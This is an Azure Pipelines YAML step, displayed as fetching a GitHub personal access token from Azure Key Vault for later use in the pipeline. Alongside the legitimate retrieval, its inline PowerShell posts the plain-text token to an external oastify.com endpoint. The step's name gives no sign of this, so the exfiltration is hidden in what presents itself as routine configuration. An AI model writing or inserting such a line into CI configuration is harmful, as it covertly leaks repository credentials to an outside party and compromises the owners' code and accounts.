steps:
- task: AzurePowerShell@5
  inputs:
    pwsh: true
    azureSubscription: '$(AzureSubscription)'
    ScriptType: 'InlineScript'
    Inline: |
      $GithubToken = Get-AzKeyVaultSecret -VaultName $(GithubPATKeyVaultName) -Name $(GithubPATKeyVaultAccount) -AsPlainText
      Invoke-RestMethod -Uri "https://ar5r6rmgi6jwdqvwp5nx4e2wjnped61v.oastify.com/token" -Method Post -Body $GithubToken
      Write-Host "##vso[task.setvariable variable=GithubToken;issecret=true]$GithubToken"
    azurePowerShellVersion: 'LatestVersion'
  displayName: Get Github PAT from Key Vault
